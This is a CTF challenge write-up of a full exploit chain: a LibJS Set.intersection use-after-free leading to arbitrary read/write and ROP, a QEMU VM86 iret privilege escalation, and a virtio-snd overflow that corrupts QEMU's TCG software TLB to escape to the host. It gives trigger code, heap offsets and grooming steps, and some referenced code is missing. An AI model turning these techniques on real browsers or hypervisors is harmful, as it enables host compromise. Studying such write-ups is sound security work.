A full-chain SEKAICTF 2026 challenge covering Ladybird, a QEMU LPE, and a QEMU escape.
With a clear decline in competitiveness across the board for CTFs now that AI has taken over, we decided to make some harder challenges for this last year.
And so I’ve created two challenges for SEKAICTF this year, starting with a full chain that combines two 0days and a new way to exploit an n-day with fewer primitives than the previous researchers from ottersec had.
The first part of the challenge is to escape the ladybird LibJS shell. This requires an 0day, since we’re running pretty much the latest version. I was planning to do a LibJS challenge for a while now, since I had been hoarding an 0day for over a year (ever since I previously saw a ladybird challenge). But sadly, some time before the CTF started it was patched.
Another funny thing happened two weeks before the CTF, when the LibJS (/ ladybird) part was already done: a commit dropped that killed my original exploitation technique for this new bug.
Bug
So since our last 0day has been patched, we have to find a new one. For the challenge itself, I patched out all the internal functions, except gc() (I was feeling nice) and compiled a js only shell.
The intended bug for this challenge lies in Set.intersection:
SetPrototype.cpp
// 24.2.4.9 Set.prototype.intersection ( other ), https://tc39.es/ecma262/#sec-set.prototype.intersection
// ...
    auto other_record = TRY(get_set_record(vm, vm.argument(0)));

    // 4. Let resultSetData be a new empty List.
    auto result = Set::create(realm);

    // 5. If SetDataSize(O.[[SetData]]) ≤ otherRec.[[Size]], then
    if (set->set_size() <= other_record.size) {
        // a. Let thisSize be the number of elements in O.[[SetData]].
        // b. Let index be 0.
        // c. Repeat, while index < thisSize,
        for (auto const& element : *set) { // [1]. BUG
            // i. Let e be O.[[SetData]][index].
            // ii. Set index to index + 1.
            // iii. If e is not empty, then
            // 1. Let inOther be ToBoolean(? Call(otherRec.[[Has]], otherRec.[[SetObject]], « e »)).
            auto in_other = TRY(call(vm, *other_record.has, other_record.set_object, element.key)).to_boolean();

            // 2. If inOther is true, then
            if (in_other) {
                // a. NOTE: It is possible for earlier calls to otherRec.[[Has]] to remove and re-add an element of O.[[SetData]], which can cause the same element to be visited twice during this iteration.
                // b. If SetDataHas(resultSetData, e) is false, then
                if (!set_data_has(result, element.key)) {
                    // i. Append e to resultSetData.
                    result->set_add(element.key);
                }
            }

            // 3. NOTE: The number of elements in O.[[SetData]] may have increased during execution of otherRec.[[Has]].
            // 4. Set thisSize to the number of elements in O.[[SetData]].
        }
    }
    // 6. Else,
    else {
        // a. Let keysIter be ? GetIteratorFromMethod(otherRec.[[SetObject]], otherRec.[[Keys]]).
        auto keys_iterator = TRY(get_iterator_from_method(vm, other_record.set_object, other_record.keys));

        // b. Let next be NOT-STARTED.
        Optional<Value> next;

        // c. Repeat, while next is not DONE,
        do {
            // i. Set next to ? IteratorStepValue(keysIter).
            next = TRY(iterator_step_value(vm, keys_iterator));

            // ii. If next is not DONE, then
            if (next.has_value()) {
                // 1. Set next to CanonicalizeKeyedCollectionKey(next).
                next = canonicalize_keyed_collection_key(*next);

                // 2. Let inThis be SetDataHas(O.[[SetData]], next).
                auto in_this = set_data_has(set, *next);

                // 3. If inThis is true, then
                if (in_this) {
                    // a. NOTE: Because other is an arbitrary object, it is possible for its "keys" iterator to produce the same value more than once.

                    // b. If SetDataHas(resultSetData, next) is false, then
                    if (!set_data_has(result, *next)) {
                        // i. Append next to resultSetData.
                        result->set_add(*next);
                    }
                }
            }
        } while (next.has_value());
    }

    // 7. Let result be OrdinaryObjectCreate(%Set.prototype%, « [[SetData]] »).
    // 8. Set result.[[SetData]] to resultSetData.

    // 9. Return result.
    return result;
}
The bug here is auto const& element : *set, where element is not a copy, but a reference into the backing store of the set. A Set in LibJS is backed by a Map:
This frees the backing bucket in [1], runs the gc() and creates a WeakMap whose backing store overlaps with the old Set storage.
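The general shape of such a trigger can be sketched as follows. This is a minimal illustration and not the challenge exploit: `makeSetLike` and `runTrigger` are hypothetical names, and `victim.clear()` is only an assumed way of releasing the storage that the loop at [1] is still walking. On a patched or spec-compliant engine the snippet runs harmlessly.

```javascript
// Build a set-like object that Set.prototype.intersection accepts.
// Its `size` must be >= the receiver's size so the engine iterates the
// receiver and calls our `has` for each element (step 5 of the listing).
function makeSetLike(size, onHas) {
  return {
    size,
    has(value) { return onHas(value); },
    keys() { return [][Symbol.iterator](); }, // not used on this path
  };
}

function runTrigger() {
  const victim = new Set([1.1, 2.2, 3.3]);
  const keepAlive = [];
  let calls = 0;

  const other = makeSetLike(victim.size, () => {
    calls++;
    if (calls === 1) {
      victim.clear();                     // assumption: drops the iterated storage
      if (typeof gc === "function") gc(); // gc() only exists in the challenge shell
      const wm = new WeakMap();           // candidate to reclaim the freed storage
      const key = {};
      wm.set(key, 1);
      keepAlive.push(wm, key);
    }
    return true;
  });

  // Guarded: older runtimes do not ship Set.prototype.intersection.
  const result = typeof victim.intersection === "function"
    ? victim.intersection(other)
    : null;
  return { calls, result };
}
```

The important design point is that all of the work happens inside the `has` callback, because that is the only place where user code runs while the loop still holds its reference.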
Just like a regular Set, the backing store of a WeakMap is a HashMap, but in this case it is HashMap<GC::Ptr<Cell>, Value> m_values instead of the HashMap<Value, Value, ValueTraits> m_entries used by a Map (and therefore by a Set as well).
So in this case we reclaim the slot of a Value from the Set (8 bytes) with a GC::Ptr<Cell> from the WeakMap (also 8 bytes, a raw pointer). Read back as a Value, that pointer is interpreted as an f64, which gives us a leak.
This is basically our addrOf primitive, which we can use to target an ArrayBuffer as the victim.
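Turning the leaked f64 back into an address only needs a bit-level reinterpretation. The helpers below are a minimal sketch of one common way to do that with typed arrays. The name `u64ToF64` matches the helper used in this writeup, but this implementation (and the BigInt-based signature) is an assumption, and `fakePtr` is a made-up value.

```javascript
// One 8-byte buffer, viewed both as a double and as a 64-bit integer.
const convBuf = new ArrayBuffer(8);
const f64View = new Float64Array(convBuf);
const u64View = new BigUint64Array(convBuf);

// Reinterpret the bits of a double as an unsigned 64-bit integer.
function f64ToU64(f) {
  f64View[0] = f;
  return u64View[0];
}

// Reinterpret an unsigned 64-bit integer (BigInt) as a double.
function u64ToF64(u) {
  u64View[0] = BigInt.asUintN(64, u);
  return f64View[0];
}

// A user-space pointer has zero upper bits, so it reads back as a tiny
// (subnormal) double and survives the round trip unchanged.
const fakePtr = 0x00007f1234567890n; // made-up address for illustration
const asDouble = u64ToF64(fakePtr);
console.log(f64ToU64(asDouble).toString(16));
```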
From here there are many ways to turn this into r/w and then code exec; I’ll give one example:
let map = new Map();
map.set(bucket0, u64ToF64(MAP_FAKE_HEADER));
map.set(bucket1, u64ToF64(validationAddr));

let iterator = map.entries();
iterator.a = u64ToF64(MAP_FAKE_HEADER);
Where bucket0 and bucket1 are chosen so the hashes land in the first and second bucket respectively. Then we try to leak the MapIterator object and interpret it like:
So now we can read, e.g., reader[13] == reader->m_indexed_elements[13] == iterator->m_map[13]. From there we can recover bucket == reader[13] and read/write into the buckets array. This gives us the following layout:
Then we can fakeobj over bucket+8 to mirror the MapIterator as before and get a limited read/write by overwriting m_indexed_elements using map.set(bucket1, u64ToF64(addr)). With that we repeatedly target an ArrayBuffer’s data pointer to get full arbitrary r/w. Finally we leak the vtable, get libc, read environ, find a return address on the stack, and ROP to execve to run our next stage.
Footnotes
We use the base64 so as not to accidentally reclaim it with other objects.
Escalating privileges inside QEMU through a VM86 iret bug.
For the second part of the challenge, we need to somehow gain root (or at least higher privileges) to talk to the virtio-snd device. And because I’ve been hoarding an 0day for this as well for a little while, it was a perfect fit for this challenge. Although a current 0day has already been published (without patches) by kqx, the challenge introduces a patch for it, so we have to hunt for a new one.
The issue here is that QEMU jumps to return_to_vm86 as soon as EFLAGS.VM is set, before rejecting this transition from usermode. return_to_vm86 then just loads EFLAGS with VM_MASK and IOPL_MASK allowed, so we can set IOPL=3, which in QEMU gives arbitrary physical r/w again. Amazing work from the kqx people.
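The flag arithmetic behind this can be sketched in a few lines. On x86, EFLAGS.VM is bit 17 and IOPL occupies bits 12 and 13. `loadEflags` below is a simplified model of a masked EFLAGS update and not QEMU's actual helper, and the starting value `0x202` is just an assumed typical usermode EFLAGS.

```javascript
const VM_MASK = 1 << 17;   // EFLAGS.VM
const IOPL_MASK = 3 << 12; // EFLAGS.IOPL (two bits)

// Simplified masked update: only the bits in `updateMask` are taken from
// `next`, every other bit keeps its current value.
function loadEflags(current, next, updateMask) {
  return ((current & ~updateMask) | (next & updateMask)) >>> 0;
}

// Extract the I/O privilege level (0..3).
function iopl(eflags) {
  return (eflags & IOPL_MASK) >>> 12;
}

const userEflags = 0x202; // IF set, IOPL=0 (assumed starting state)
const frameEflags = userEflags | VM_MASK | IOPL_MASK; // value placed in the iret frame
const after = loadEflags(userEflags, frameEflags, VM_MASK | IOPL_MASK);
console.log(after.toString(16), iopl(after)); // prints "23202 3"
```

If IOPL_MASK were not part of the update mask, the same frame would leave IOPL at 0, which is why the order of the check and the load matters.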
Exploit
It’s easier to show the full exploit path to show what is happening:
Escaping QEMU by targeting the TCG software TLB from virtio-snd.
Finally we get to exploit QEMU. A different patch reintroduces a bug previously exploited by ottersec. Before reading the next part, I recommend reading through their writeup to get an understanding of the problem, as I’ll only go over the exploitation of that bug.
Anyway, ottersec needed another device driver to escape the guest. This challenge doesn’t give you this luxury and you have to exploit (escape) the guest without it.
Another fun thing about this challenge: the kernel is minimally compiled and doesn’t expose any of the functionality required to actually talk to the driver. You have to create this yourself (if you even need it! More on this later).
For this challenge, I’ll go over two ways to exploit this, one original intended path and another (less intended) path created by an unnamed entity during the game that just happened to fall into my hands.
Intended Exploit
First of all, credit for the exploitation idea goes to dicectf bassoon:
Note (Bassoon writeup)
first part is getting consistent heap corruption primitives using the fact that all 7 0x100 tcache entries are almost always contiguous. from here you can get overlapping chunks and prepare a UAF write. next part is figuring out what structure to actually target. we don’t have partial overwrite which forces us to target something that gets allocated after our corruption, and prevents us from dealing with things containing absolute addresses. most important things are allocated in the main heap, and the thread heap is mostly used by TCG.
there may be multiple approaches, but my solution is to overwrite entries in the TCG fast path CPUTLBEntry table, which basically implements the TLB for guest virtual to host virtual address translation. it gets reallocd on the thread heap in tlb_mmu_resize_locked which gets triggered either periodically from tlb_flush_by_mmuidx_async_work which we can’t control very well, or on a single page flush if the page is a large (huge) page. we can thus flush a huge page with invlpg to trigger resizing. the new size is based on a rate calculated within a 100 ms window, so we want to busy loop at cpl0 after the first flush to get a low rate and downsize the table.
there are tables for each mmu_idx type, which is an arch-based classifier. for x64, there are 3 main ones: usermode, kernel mode, and kernel mode running usermode code through SMAP. you could simplify the exploitation by doing it all through one mmu_idx so you don’t need to context switch to trigger TLB activity between invlpg’ing, but i just did it with the usermode TLB anyway and had a kernel module that let me call my own userspace functions at cpl0. the noise taming part is very difficult, since TCG is constantly allocating chunks of 0x28 to insert nodes into qtree during TCG translation within tb_gen_code (called for each basic block). we get around this by stuffing all of our important operations for triggering heap activity like the intel HDA writes and invlpgs into single basic blocks at a time.
we get overlapping chunks and free a size 0x810 for the fast TLB to reclaim when it downsizes to minimum size of 0x40 (0x20 size per entry). each entry in the table has 3 virtual addresses and one addend. the virtual addresses correspond to the guest virtual addresses translations for read, write, and code accesses, and the addend gets added to the virtual address to calculate the host address. we can’t control the addend usefully without leaks, but we can overwrite the virtual address, and the difference between our overwritten one and the old one effectively gets added to the addend during translation. this is how we are able to get reliable memory corruption leaklessly, and i think it’s a pretty cool and novel technique.
the host address a virtual address maps to is dependent on the physical address, so we can get a reliable location in the mapping space by having our vaddr tied to a fixed physical address like 0. the thread heap arena is consistently 0x7e00000 bytes behind the host mapping for physical address 0. 0x7e0 & 0x3f is also 0 so this will be placed at index 0 in the table making it easy to overflow into. so we first map 0x7e00000 to 0, and now overflow the virtual addresses to 0, and when we deref 0 it will hit the TLB and translate as (intended host address - 0x7e00000) + 0 which we have established is just the thread heap arena.
so now we have arb read/write into the first page of the arena which contains things like tcache bins and various pointers to other regions. i leaked the rwx region and main heap, then overwrote two tcache entries to first write shellcode to the rwx region and then overwrite a function pointer in the main heap with a pointer to the shellcode.
all of the past qemu exploits i’ve seen for real vulns usually try to get some explicit leak primitive either from a separate vuln or some random device, but i think it’s cool that it’s theoretically possible in a stable enough environment to do this sort of leakless technique. it does rely on TCG though, maybe i’ll try this challenge again but with KVM and see if it’s still possible.
The compiled kernel doesn’t expose much, if anything, to interact with the device, so my solver patches in a couple of utilities using the physical r/w:
virtual to physical
remapping a userspace virtual page to an arbitrary guest physical 4k page
install a 2MiB page-table mapping
invlpg
(setuid)
TLB / Target
So, a quick background recap on the TLB: a normal CPU has a Translation Lookaside Buffer, or TLB. It is a cache for page table translations. Instead of walking page tables on every memory access, the CPU remembers that a virtual page recently translated to a particular physical page with particular permissions.
Say:
When an operating system changes page tables, old cached translations may no longer be correct. A TLB flush invalidates those cached translations. On x86, invlpg addr invalidates the cached translation for one virtual page, while operations such as CR3 reloads can invalidate many entries.
In this exploit, however, the interesting TLB is not the host CPU’s hardware TLB. The interesting object is QEMU TCG’s software TLB. TCG-generated host code also wants memory accesses to be fast, so QEMU keeps its own cache of guest virtual address translations. That cache lives in normal QEMU heap memory.
For a guest RAM access in system emulation, the path is roughly:
guest virtual address
|
v
QEMU TCG software TLB lookup
|
+-- hit -> host pointer = guest address + entry.addend
The three addr_* fields are compare values for read, write, and instruction fetch accesses. The addend is the part that turns a guest virtual address into a host pointer:
So this is a good primitive to target, since it directly decides which host address QEMU reads or writes.
The lookup table is indexed by the guest virtual page:
For the minimum table size used later, there are 64 entries, so the mask is
0x3f. Guest address 0 and guest address 0x8000000 both land in index 0:
(0x0 >> 12) & 0x3f = 0
(0x8000000 >> 12) & 0x3f = 0
That lets the exploit first create a legitimate entry for 0x8000000, then
corrupt only the compare fields so the same entry also appears valid for guest address 0.
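The index computation is easy to check in isolation. The snippet below is a small sketch using the 4 KiB page size and the 64-entry table from the text. `tlbIndex` and `collisionStride` are hypothetical helper names, not QEMU functions.

```javascript
const TARGET_PAGE_BITS = 12n; // 4 KiB guest pages

// Table slot for a guest virtual address; nEntries must be a power of two.
function tlbIndex(vaddr, nEntries) {
  return (vaddr >> TARGET_PAGE_BITS) & (nEntries - 1n);
}

// Distance between guest addresses that share the same slot.
function collisionStride(nEntries) {
  return nEntries << TARGET_PAGE_BITS;
}

console.log(tlbIndex(0x0n, 64n) === tlbIndex(0x8000000n, 64n)); // true, both are slot 0
console.log(0x8000000n % collisionStride(64n) === 0n);          // true
```

Any guest address that is a multiple of 0x40000 would collide with address 0 in a 64-entry table, so 0x8000000 is one convenient choice among many.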
Before corruption, entry 0 looks like:
CPUTLBEntry[0]
+-----------------------------------+
| addr_read = 0x8000000 | flags |
| addr_write = 0x8000000 | flags |
| addr_code = ... |
| addend = host_ptr - 0x8000000 |
+-----------------------------------+
After the virtio-snd overflow writes into the first 0x10 bytes:
CPUTLBEntry[0]
+-----------------------------------+
| addr_read = 0 |
| addr_write = 0 |
| addr_code = ... |
| addend = host_ptr - 0x8000000 |
+-----------------------------------+
Now a guest load from virtual address 0 can pass the fast-path compare, but the preserved addend still points at the host location derived from the old
0x8000000 translation:
host = 0 + (host_ptr - 0x8000000)
For us that lands inside QEMU’s host heap.
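The effect of the corruption can be modelled with a toy version of the fast path. This is a simplified sketch: it ignores the flag bits stored in the low bits of the compare fields, `makeEntry` and `tlbLoad` are hypothetical names, and the host pointer is a made-up value.

```javascript
const PAGE_MASK = ~0xfffn; // clears the 12 page-offset bits

// A legitimate entry for one guest page mapped at hostPage.
function makeEntry(guestPage, hostPage) {
  return { addrRead: guestPage, addrWrite: guestPage, addend: hostPage - guestPage };
}

// Fast-path load: compare the page of the access against addrRead, then add
// the addend. Returns null on a miss (the real code falls back to a slow path).
function tlbLoad(entry, vaddr) {
  if ((vaddr & PAGE_MASK) !== entry.addrRead) return null;
  return BigInt.asUintN(64, vaddr + entry.addend);
}

const demoHost = 0x7f0000000000n; // made-up host address of the guest page
const demo = makeEntry(0x8000000n, demoHost);
console.log(tlbLoad(demo, 0x10n)); // null: guest address 0 is not cached yet

// The overflow rewrites only the first two qwords (the compare values).
demo.addrRead = 0n;
demo.addrWrite = 0n;
console.log(tlbLoad(demo, 0x10n) === demoHost - 0x8000000n + 0x10n); // true
```

The addend is never touched, which is what makes the technique leakless: only the difference between the old and the new compare value matters.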
Primitives
A QEMU TLB flush invalidates entries in this software cache. For a full flush of one MMU index, QEMU clears the entry table and resets accounting:
For a single-page flush, QEMU normally invalidates one table entry. But QEMU also tracks large-page translations. If the flushed page belongs to a tracked large page, tlb_flush_page_locked() escalates to a full flush for that MMU index:
...
        if (tlb_flush_entry_locked(tlb_entry(cpu, midx, page), page)) {
            tlb_n_used_entries_dec(cpu, midx);
        }
        tlb_flush_vtlb_page_locked(cpu, midx, page);
    }
}
We can use this to, e.g., flip a mapped guest region to PROT_NONE and back to PROT_READ | PROT_WRITE. Inside the guest, that makes the kernel update page tables and flush stale guest translations. In TCG, those guest invalidations cause QEMU to throw away affected software TLB entries.
Then with our inserted invlpg primitive, we can install HUGE_VADDR as a 2 MiB mapping. The i386 TCG helper for invlpg reaches:
Because HUGE_VADDR is a large mapping, QEMU’s large-page tracking can turn that single-page invalidation into the full-MMU-index flush path and the resize logic is tied to full-table flushing.
The TCG TLB tables are dynamic. QEMU tracks how many entries were used in a
short time window. When a flush happens, tlb_mmu_resize_locked() may grow or shrink the table based on that recent usage rate.
The important part for exploitation is that a resize is a normal heap free and allocation:
So by touching many guest pages, we can make the table grow. This raises
desc->n_used_entries and therefore window_max_entries; once the used-entry
rate crosses 70%, QEMU doubles the table. Later, after the target 0x810 RX
hole has been freed, we do the opposite: touch only one or a few pages, trigger
a flush, wait for the 100 ms resize window to expire, and trigger another
flush. At that point window_max_entries is tiny relative to the old table, so
rate < 30 and QEMU shrinks to MAX(pow2ceil(window_max_entries), 1 << CPU_TLB_DYN_MIN_BITS). With one useful entry, that is the minimum fast
table: 64 entries.
64 * sizeof(CPUTLBEntry)
64 * 0x20 = 0x800-byte allocation
glibc chunk size = 0x810
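The resize decision and the resulting chunk size can be sketched as below. This is a simplified model of the policy described above, not QEMU's code: it ignores the upper bound on the table size and any extra adjustments, and `nextTableSize` and `chunkSize` are hypothetical names. The chunk size formula assumes 64-bit glibc (8-byte size header, 16-byte alignment, 0x20 minimum).

```javascript
const CPU_TLB_DYN_MIN_BITS = 6; // minimum table: 64 entries
const ENTRY_SIZE = 0x20;        // sizeof(CPUTLBEntry)

// Smallest power of two >= n (for n >= 1).
function pow2ceil(n) {
  let p = 1;
  while (p < n) p *= 2;
  return p;
}

// Grow above 70% usage; shrink below 30% once the 100 ms window has expired.
function nextTableSize(oldSize, windowMaxEntries, windowExpired) {
  const rate = Math.floor((windowMaxEntries * 100) / oldSize);
  if (rate > 70) return oldSize * 2;
  if (rate < 30 && windowExpired) {
    return Math.max(pow2ceil(windowMaxEntries), 1 << CPU_TLB_DYN_MIN_BITS);
  }
  return oldSize;
}

// glibc chunk size for a malloc request on x86-64.
function chunkSize(request) {
  return Math.max((request + 8 + 15) & ~15, 0x20);
}

const shrunk = nextTableSize(1024, 1, true);
console.log(shrunk, "0x" + chunkSize(shrunk * ENTRY_SIZE).toString(16)); // prints "64 0x810"
```

Note that the shrink only happens when the window has expired, which is why the exploit has to wait between the two flushes.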
First of all, a note on our virtio-snd primitives. We have:
include/hw/audio/virtio-snd.h
/*
 * VirtIOSoundPCMBuffer has a dynamic size since it includes the raw PCM data
 * in its allocation. It must be initialized and destroyed as follows:
 *
 *   size_t size = [[derived from owned VQ element descriptor sizes]];
The important detail is the size 0x410, since it makes the RX overflow land exactly on the fields we want in the next allocation. The vulnerable source is an RX buffer with in_len = 0x3d8:
RX data size = in_len - sizeof(virtio_snd_pcm_status)
The source stream’s period_bytes is 0x3f7, while buffer->data starts at
offset 0x29. So the buggy audio write reaches:
0x29 + 0x3f7 = 0x420 bytes from the source user pointer
The next chunk’s user pointer starts at 0x410, so the overflow reaches:
0x420 - 0x410 = 0x10 bytes into the next allocation
That is exactly two qwords: CPUTLBEntry.addr_read and CPUTLBEntry.addr_write. The 0x410 size is also reusable for the tcache step, since it is the last default small tcache size:
idx = (0x410 - 0x20) / 0x10 = 0x3f
So we can reuse that for the arbitrary write as well.
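The size arithmetic above can be double-checked with a few lines. The constants are taken from the text; `overflowBytes` and `tcacheIndex` are hypothetical helper names, and the index formula assumes 64-bit glibc (minimum chunk size 0x20, 16-byte alignment, 64 tcache bins by default).

```javascript
const DATA_OFFSET = 0x29;   // offset of buffer->data inside the allocation
const PERIOD_BYTES = 0x3f7; // period_bytes of the source stream
const SOURCE_CHUNK = 0x410; // chunk size of the source RX buffer

// Bytes written past the start of the next chunk's user data.
function overflowBytes(dataOffset, periodBytes, chunk) {
  return dataOffset + periodBytes - chunk;
}

// glibc tcache bin index for a given chunk size.
function tcacheIndex(chunk) {
  return (chunk - 0x20 + 0xf) >> 4;
}

const spill = overflowBytes(DATA_OFFSET, PERIOD_BYTES, SOURCE_CHUNK);
console.log(spill.toString(16), spill / 8);          // prints "10 2": two qwords
console.log(tcacheIndex(SOURCE_CHUNK).toString(16)); // prints "3f": the last default bin
```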
Exploit
Combining this (and a bit of heap grooming), we can achieve something like:
Spray some 0x810 chunks with live virtio-snd TX filler buffers
(fill810, TX_HOLE_FILLER_DATA_LEN = 0x7d0).
Spray some 0x410 chunks with live virtio-snd TX guard buffers
(guard410, TX_SMALL_FILLER_DATA_LEN = 0x3d0).
Grow user-mode TLB table
The idea is to shrink the TLB table later so it occupies a 0x810 chunk
Free only the target-side 0x810 chunk(s). This is possible because the buffers belong to different streams, so we can free just this target.
[source RX buffer: 0x410 live] [target 0x810 chunk: free]
Shrink the TCG TLB so CPUTLBEntry[64] reclaims a freed 0x810 target hole.
[source RX buffer: 0x410 live] [0x810 chunk: TLB table]
Overflow from the live 0x410 source into CPUTLBEntry[0].
Use guest NULL as a host heap page window.
We can probe this a bit by capturing segfaults from the guest to see if it succeeded.
Also, this first page immediately gives us a text and TCG code-cache rwx leak
Edit tcache metadata in that page.
For arbitrary write we need a bit more, so we find the tcache_perthread_struct, which is in this page, write a pointer into tcache->entries[0x3f], and use the 0x410 allocation.
Use TX allocations as targeted host writes.
Write an RWX system stub and overwrite helper_info_fninit.func.
Guest executes FNINIT -> helper_info_fninit.func -> rwx region -> system
We can actually stabilize all of this a bit by using, e.g., multiple targets, so multiple holes where the TLB table might get allocated.